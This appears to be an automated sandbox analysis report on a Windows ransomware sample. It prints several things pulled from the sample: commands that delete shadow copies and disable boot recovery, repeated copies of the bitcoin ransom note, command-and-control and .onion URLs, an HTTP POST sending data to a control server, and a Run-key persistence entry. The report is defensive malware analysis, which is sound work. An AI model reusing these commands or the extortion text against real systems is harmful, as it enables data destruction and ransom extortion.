Analysis Report

Overview

General Information

Joe Sandbox Version:	14.0.0
Analysis ID:	125244
Start time:	12:12:31
Joe Sandbox Product:	Cloud
Start date:	12/05/2016
Overall analysis duration:	0h 9m 3s
Report type:	full
Sample file name:	94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 (Office 2003 SP1, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 41, Firefox 36)
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled HDC enabled
Detection:	MAL
Classification:	mal76.evad.rans.phis.spyw.troj.winEXE@20/232@15/6
HCA Information:	Successful, ratio: 100% Number of executed functions: 81 Number of non-executed functions: 69
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 31.1% (good quality ratio 26.7%) Quality average: 66.7% Quality standard deviation: 35.8%
Cookbook Comments:	Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): mscorsvw.exe, sppsvc.exe, VSSVC.exe, WmiApSrv.exe, conhost.exe, WMIADAP.exe, dllhost.exe Report size exceeded maximum capacity and may have missing behavior information.

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	76	0 - 100	Report FP / FN

Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox

Sample sleeps for a long time, analyze it with the fake sleep cookbook

Signature Overview

• Spam, unwanted Advertisements and Ransom Demands
• Networking
• Boot Survival
• Stealing of Sensitive Information
• Persistence and Installation Behavior
• Data Obfuscation
• Spreading
• System Summary
• HIPS / PFW / Operating System Protection Evasion
• Anti Debugging
• Malware Analysis System Evasion
• Hooking and other Techniques for Hiding and Protection
• Lowering of HIPS / PFW / Operating System Security Settings
• Language, Device and Operating System Detection

Click to jump to signature section

Spam, unwanted Advertisements and Ransom Demands:

Deletes shadow drive data (may be related to ransomware)

Show sources

Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Binary or memory string: fwindir%s\system32\cmd.exe/c start "" ""runasvssadmin.exe delete shadows /all /Quiet openrunas234058000Shell32.dllKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\recover_file_.txt:Zone.IdentifierSeDebugPrivilege12393578327533451bcdedit.exe /set {current} bootems offbcdedit.exe /set {current} advancedoptions offbcdedit.exe /set {current} optionsedit offbcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailuresbcdedit.exe /set {current} recoveryenabled offw+%s
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Process created: C:\Windows\System32\vssadmin.exe C:\Windows\System32\vssadmin.exe delete shadows /all /Quiet
Source: amhfnhe45.exe	Binary or memory string: fwindir%s\system32\cmd.exe/c start "" ""runasvssadmin.exe delete shadows /all /Quiet openrunas234058000Shell32.dllKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\recover_file_.txt:Zone.IdentifierSeDebugPrivilege12393578327533451bcdedit.exe /set {current} bootems offbcdedit.exe /set {current} advancedoptions offbcdedit.exe /set {current} optionsedit offbcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailuresbcdedit.exe /set {current} recoveryenabled offw+%s
Source: vssadmin.exe	Binary or memory string: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
Source: vssadmin.exe	Binary or memory string: C:\C:\Windows\System32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet C:\Windows\System32\vssadmin.exeWinsta0\Default
Source: vssadmin.exe	Binary or memory string: oF oF0oF:oFC:\Windows\System32\vssadmin.exedeleteshadows/all/Quiet
Source: vssadmin.exe	Binary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exe	Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exe	Binary or memory string: vssadmin Delete Shadows
Source: vssadmin.exe	Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exe	Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:

Writes a notice file (html or txt) to demand a ransom

Show sources

Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File dropped: C:\$Recycle.Bin\S-1-5-21-312302014-279660585-3511680526-1001\help_recover_instructions+uuk.txt -> __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! not your language? use https://translate.google.com what happened to your files ?all of your files were protected by a strong encryption with rsa-4096.more information about the encryption keys using rsa-4096 can be found here: http://en.wikipedia.org/wiki/rsa_(cryptosystem)how did this happen ?!!! specially for your pc was generated personal rsa-4096 key, both public and private.!!! all your files were encrypted with the public key, which has been transferred to your computer via the internet.decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining btc now, and restore your data easy way.if you have really
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File dropped: C:\$Recycle.Bin\S-1-5-21-312302014-279660585-3511680526-1001\help_recover_instructions+uuk.html -> <html><!-- 72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33ccff;"> <!--72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234-72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <center><div style="text-align:left; font-family:arial; <!------72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#f4f4f4; padding:20px; border-style:solid; border-width:5px; border-color:#bababa;"><b><font class="ttl"><center><b>not your language? use <a href="https://translate.google.com" ta
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File dropped: C:\$Recycle.Bin\help_recover_instructions+uuk.txt -> __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! not your language? use https://translate.google.com what happened to your files ?all of your files were protected by a strong encryption with rsa-4096.more information about the encryption keys using rsa-4096 can be found here: http://en.wikipedia.org/wiki/rsa_(cryptosystem)how did this happen ?!!! specially for your pc was generated personal rsa-4096 key, both public and private.!!! all your files were encrypted with the public key, which has been transferred to your computer via the internet.decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining btc now, and restore your data easy way.if you have really valuable data, you better not waste your tim
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File dropped: C:\$Recycle.Bin\help_recover_instructions+uuk.html -> <html><!-- 72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33ccff;"> <!--72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234-72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <center><div style="text-align:left; font-family:arial; <!------72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#f4f4f4; padding:20px; border-style:solid; border-width:5px; border-color:#bababa;"><b><font class="ttl"><center><b>not your language? use <a href="https://translate.google.com" target="_blank">google translate</a></b></cente
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File dropped: C:\Users\admin\AppData\Local\Adobe\Acrobat\11.0\Cache\help_recover_instructions+uuk.txt -> __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! not your language? use https://translate.google.com what happened to your files ?all of your files were protected by a strong encryption with rsa-4096.more information about the encryption keys using rsa-4096 can be found here: http://en.wikipedia.org/wiki/rsa_(cryptosystem)how did this happen ?!!! specially for your pc was generated personal rsa-4096 key, both public and private.!!! all your files were encrypted with the public key, which has been transferred to your computer via the internet.decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining btc now, and restore your data easy way.if you have really valuab
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File dropped: C:\Users\admin\AppData\Local\Adobe\Acrobat\11.0\Cache\help_recover_instructions+uuk.html -> <html><!-- 72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33ccff;"> <!--72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234-72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <center><div style="text-align:left; font-family:arial; <!------72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#f4f4f4; padding:20px; border-style:solid; border-width:5px; border-color:#bababa;"><b><font class="ttl"><center><b>not your language? use <a href="https://translate.google.com" target="_
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File dropped: C:\Users\admin\AppData\Local\Adobe\Acrobat\11.0\help_recover_instructions+uuk.txt -> __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! not your language? use https://translate.google.com what happened to your files ?all of your files were protected by a strong encryption with rsa-4096.more information about the encryption keys using rsa-4096 can be found here: http://en.wikipedia.org/wiki/rsa_(cryptosystem)how did this happen ?!!! specially for your pc was generated personal rsa-4096 key, both public and private.!!! all your files were encrypted with the public key, which has been transferred to your computer via the internet.decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining btc now, and restore your data easy way.if you have really valuable dat
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File dropped: C:\Users\admin\AppData\Local\Adobe\Acrobat\11.0\help_recover_instructions+uuk.html -> <html><!-- 72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33ccff;"> <!--72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234-72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <center><div style="text-align:left; font-family:arial; <!------72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#f4f4f4; padding:20px; border-style:solid; border-width:5px; border-color:#bababa;"><b><font class="ttl"><center><b>not your language? use <a href="https://translate.google.com" target="_blank"
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File dropped: C:\Users\admin\AppData\Local\Adobe\Acrobat\9.0\Cache\help_recover_instructions+uuk.txt -> __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! not your language? use https://translate.google.com what happened to your files ?all of your files were protected by a strong encryption with rsa-4096.more information about the encryption keys using rsa-4096 can be found here: http://en.wikipedia.org/wiki/rsa_(cryptosystem)how did this happen ?!!! specially for your pc was generated personal rsa-4096 key, both public and private.!!! all your files were encrypted with the public key, which has been transferred to your computer via the internet.decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining btc now, and restore your data easy way.if you have really valuabl
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File dropped: C:\Users\admin\AppData\Local\Adobe\Acrobat\9.0\Cache\help_recover_instructions+uuk.html -> <html><!-- 72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33ccff;"> <!--72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234-72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <center><div style="text-align:left; font-family:arial; <!------72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#f4f4f4; padding:20px; border-style:solid; border-width:5px; border-color:#bababa;"><b><font class="ttl"><center><b>not your language? use <a href="https://translate.google.com" target="_b

Networking:

Urls found in memory or binary data

Show sources

Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	String found in binary or memory: file:///c:/windows/system32/cmd.exe
Source: amhfnhe45.exe	String found in binary or memory: file:///c:/windows/system32/vssadmin.exe
Source: amhfnhe45.exe	String found in binary or memory: http://aynf
Source: amhfnhe45.exe	String found in binary or memory: http://aynfksddnnfwkd.jockmias.com/%s
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, amhfnhe45.exe	String found in binary or memory: http://aynfksddnnfwkd.jockmias.com/%s2.
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, amhfnhe45.exe	String found in binary or memory: http://aynfksddnnfwkd.jockmias.com/%s4.
Source: amhfnhe45.exe	String found in binary or memory: http://aynfksddnnfwkd.jockmias.com/aa6a331c729ca
Source: help_recover_instructions+uuk.html5.2748.dr	String found in binary or memory: http://aynfksddnnfwkd.jockmias.com/aa6a331c729ca1f
Source: help_recover_instructions+uuk.html5.2748.dr	String found in binary or memory: http://en.wikipedia.org/wiki/rsa_(cryptosystem)
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, amhfnhe45.exe	String found in binary or memory: http://go.microsoft.com/fwlink/?linkid=125824-http://go.microsoft.com/fwlink/?linkid=125723-http://g
Source: bcdedit.exe	String found in binary or memory: http://go.microsoft.com/fwlink/?linkid=92362.
Source: amhfnhe45.exe	String found in binary or memory: http://ib.adnxs.com/seg?add=2594913:0&t=2
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, amhfnhe45.exe	String found in binary or memory: http://ip.tyk.nu/
Source: amhfnhe45.exe	String found in binary or memory: http://ip.tyk.nu/q4
Source: amhfnhe45.exe	String found in binary or memory: http://ip.tyk.nu/w4
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, amhfnhe45.exe	String found in binary or memory: http://krf
Source: amhfnhe45.exe	String found in binary or memory: http://krfdnhfnsai3d.abeleros.com/%
Source: amhfnhe45.exe	String found in binary or memory: http://krfdnhfnsai3d.abeleros.com/%s
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, amhfnhe45.exe	String found in binary or memory: http://krfdnhfnsai3d.abeleros.com/%s3.
Source: help_recover_instructions+uuk.html5.2748.dr	String found in binary or memory: http://krfdnhfnsai3d.abeleros.com/aa6a331c729ca1f
Source: amhfnhe45.exe	String found in binary or memory: http://mad4milk.net
Source: amhfnhe45.exe	String found in binary or memory: http://mengzhaoshituan.com/dbinfo.php
Source: amhfnhe45.exe	String found in binary or memory: http://mengzhaoshituan.com/dbinfo.phpu
Source: amhfnhe45.exe	String found in binary or memory: http://mootools.net
Source: amhfnhe45.exe	String found in binary or memory: http://partaci.info/administrator/components/com_languages/views/installed/tmpl/dbinfo.php
Source: amhfnhe45.exe	String found in binary or memory: http://partaci.info/administrator/components/com_languages/views/installed/tmpl/dbinfo.php?
Source: amhfnhe45.exe	String found in binary or memory: http://partaci.info/administrator/components/com_languages/views/installed/tmpl/dbinfo.phpa
Source: amhfnhe45.exe	String found in binary or memory: http://pvsea.org/cms/layouts/joomla/tinymce/dbinfo.php
Source: amhfnhe45.exe	String found in binary or memory: http://pvsea.org/cms/layouts/joomla/tinymce/dbinfo.phpa
Source: amhfnhe45.exe	String found in binary or memory: http://pvsea.org/cms/layouts/joomla/tinymce/dbinfo.phpfin4vxqc6u6bssqbew=yp=yp=
Source: amhfnhe45.exe	String found in binary or memory: http://tellambode.com/plugins/captcha/dbinfo.php
Source: amhfnhe45.exe	String found in binary or memory: http://tellambode.com/plugins/captcha/dbinfo.php02c
Source: amhfnhe45.exe	String found in binary or memory: http://topdrivers.org/components/com_mailto/views/dbinfo.php
Source: amhfnhe45.exe	String found in binary or memory: http://upatguadeloupe.com/cb/dbinfo.php
Source: amhfnhe45.exe	String found in binary or memory: http://upatguadeloupe.com/cb/dbinfo.phpa
Source: amhfnhe45.exe	String found in binary or memory: http://www.torproject.org/projects/
Source: help_recover_instructions+uuk.html5.2748.dr	String found in binary or memory: http://www.torproject.org/projects/torbrowser.html.en
Source: amhfnhe45.exe	String found in binary or memory: http://www.upatguadeloupe.com/fr/error4041
Source: amhfnhe45.exe	String found in binary or memory: http://www.upatguadeloupe.com/fr/error4041o
Source: amhfnhe45.exe	String found in binary or memory: http://www.w3.org/1999/xlink
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, amhfnhe45.exe	String found in binary or memory: https://
Source: amhfnhe45.exe	String found in binary or memory: https://4nauizsaaopuj3qj.onion.cab/%s
Source: help_recover_instructions+uuk.html5.2748.dr	String found in binary or memory: https://4nauizsaaopuj3qj.onion.cab/aa6a331c729ca1f
Source: amhfnhe45.exe	String found in binary or memory: https://4nauizsaaopuj3qj.onion.to/%s
Source: help_recover_instructions+uuk.html5.2748.dr	String found in binary or memory: https://4nauizsaaopuj3qj.onion.to/aa6a331c729ca1f
Source: amhfnhe45.exe	String found in binary or memory: https://4nauizsaaopuj3qj.tor2web.org/%s
Source: help_recover_instructions+uuk.html5.2748.dr	String found in binary or memory: https://4nauizsaaopuj3qj.tor2web.org/aa6a331c729ca1f
Source: amhfnhe45.exe, help_recover_instructions+uuk.txt45.2748.dr, help_recover_instructions+uuk.html41.2748.dr, help_recover_instructions+uuk.html31.2748.dr, help_recover_instructions+uuk.txt52.2748.dr, help_recover_instructions+uuk.txt46.2748.dr, help_recover_instructions+uuk.txt28.2748.dr, help_recover_instructions+uuk.html49.2748.dr, help_recover_instructions+uuk.html33.2748.dr, help_recover_instructions+uuk.html21.2748.dr, help_recover_instructions+uuk.txt21.2748.dr, help_recover_instructions+uuk.html20.2748.dr, help_recover_instructions+uuk.txt7.2748.dr, help_recover_instructions+uuk.txt71.2748.dr, help_recover_instructions+uuk.html44.2748.dr, help_recover_instructions+uuk.html48.2748.dr, help_recover_instructions+uuk.html29.2748.dr, help_recover_instructions+uuk.txt49.2748.dr, help_recover_instructions+uuk.html53.2748.dr, help_recover_instructions+uuk.txt33.2748.dr, help_recover_instructions+uuk.txt16.2748.dr, help_recover_instructions+uuk.txt2.2748.dr, help_recover_instructions+uuk.txt17.2748.dr, help_recover_instructions+uuk.html12.2748.dr, help_recover_instructions+uuk.txt20.2748.dr, help_recover_instructions+uuk.html11.2748.dr, help_recover_instructions+uuk.html26.2748.dr, help_recover_instructions+uuk.html0.2748.dr, help_recover_instructions+uuk.html68.2748.dr, help_recover_instructions+uuk.html56.2748.dr, help_recover_instructions+uuk.html2.2748.dr, help_recover_instructions+uuk.html4.2748.dr, help_recover_instructions+uuk.txt40.2748.dr, help_recover_instructions+uuk.txt4.2748.dr, help_recover_instructions+uuk.html3.2748.dr, help_recover_instructions+uuk.html23.2748.dr, help_recover_instructions+uuk.html7.2748.dr, help_recover_instructions+uuk.html67.2748.dr, help_recover_instructions+uuk.txt69.2748.dr, help_recover_instructions+uuk.txt29.2748.dr, help_recover_instructions+uuk.txt56.2748.dr, help_recover_instructions+uuk.html25.2748.dr, help_recover_instructions+uuk.txt19.2748.dr, help_recover_instructions+uuk.html1.2748.dr, help_recover_instructions+uuk.html5.2748.dr	String found in binary or memory: https://translate.google.com

Contains functionality to download additional files from the internet

Show sources

Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe

Code function: 1_2_0041BB40 InternetReadFile,

1_2_0041BB40

Downloads files

Show sources

Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe

File created: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OKZXCG0M\76HMLWKC.txt

Downloads files from webservers via HTTP

Show sources

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko Host: ip.tyk.nu

Found strings which match to known social media urls

Show sources

Source: amhfnhe45.exe	String found in binary or memory: yahoo.com equals www.yahoo.com (Yahoo)
Source: amhfnhe45.exe	String found in binary or memory: yahoo.com/ equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: ip.tyk.nu

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: POST /components/com_mailto/views/dbinfo.php HTTP/1.1 Accept: y6 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko Host: topdrivers.org Content-Length: 741 Cache-Control: no-cache Data Raw: 64 61 74 61 3d 41 41 33 38 37 41 32 45 43 44 44 30 45 36 44 44 30 32 44 45 38 43 37 38 36 34 42 32 44 46 32 41 36 43 33 42 42 43 34 35 46 42 34 31 33 33 31 44 43 34 35 46 38 36 34 39 44 42 44 33 36 44 30 45 43 33 34 30 41 39 43 34 32 33 45 35 46 45 45 44 33 39 35 46 39 39 38 38 38 30 36 44 35 42 46 45 33 37 36 36 42 38 34 46 42 42 33 39 32 41 39 34 39 31 30 37 39 43 38 46 33 37 46 39 33 38 34 33 39 46 37 35 38 39 43 30 32 46 41 39 31 42 41 39 44 36 30 30 37 32 37 32 31 38 42 30 30 31 39 34 39 38 39 42 34 32 33 37 46 38 36 36 42 39 35 38 43 34 41 42 35 31 30 34 34 35 42 41 37 37 37 34 37 37 41 38 30 30 42 33 30 35 32 43 43 38 33 33 46 42 32 42 36 38 38 42 38 36 42 33 41 43 46 41 31 36 42 33 39 44 30 30 39 41 31 45 31 45 34 46 35 44 31 44

Tries to download non-existing http data (HTTP/1.1 404 Not Found)

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 12 May 2016 10:14:19 GMT Server: Apache Content-Length: 236 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: DYNSRV=lin238; path=/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 63 6f 6d 5f 6d 61 69 6c 74 6f 2f 76 69 65 77 73 2f 64 62 69 6e 66 6f 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><bod

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko Host: ip.tyk.nu
Source: global traffic	HTTP traffic detected: POST /components/com_mailto/views/dbinfo.php HTTP/1.1 Accept: y6 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko Host: topdrivers.org Content-Length: 741 Cache-Control: no-cache Data Raw: 64 61 74 61 3d 41 41 33 38 37 41 32 45 43 44 44 30 45 36 44 44 30 32 44 45 38 43 37 38 36 34 42 32 44 46 32 41 36 43 33 42 42 43 34 35 46 42 34 31 33 33 31 44 43 34 35 46 38 36 34 39 44 42 44 33 36 44 30 45 43 33 34 30 41 39 43 34 32 33 45 35 46 45 45 44 33 39 35 46 39 39 38 38 38 30 36 44 35 42 46 45 33 37 36 36 42 38 34 46 42 42 33 39 32 41 39 34 39 31 30 37 39 43 38 46 33 37 46 39 33 38 34 33 39 46 37 35 38 39 43 30 32 46 41 39 31 42 41 39 44 36 30 30 37 32 37 32 31 38 42 30 30 31 39 34 39 38 39 42 34 32 33 37 46 38 36 36 42 39 35 38 43 34 41 42 35 31 30 34 34 35 42 41 37 37 37 34 37 37 41 38 30 30 42 33 30 35 32 43 43 38 33 33 46 42 32 42 36 38 38 42 38 36 42 33 41 43 46 41 31 36 42 33 39 44 30 30 39 41 31 45 31 45 34 46 35 44 31 44

Boot Survival:

Creates an autostart registry key

Show sources

Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run game342
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run game342

Stealing of Sensitive Information:

Searches for Windows Mail specific files

Show sources

Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail *
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery unknown

Send process data via the network to a C&C

Show sources

Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Network send: 185.24.99.98 80
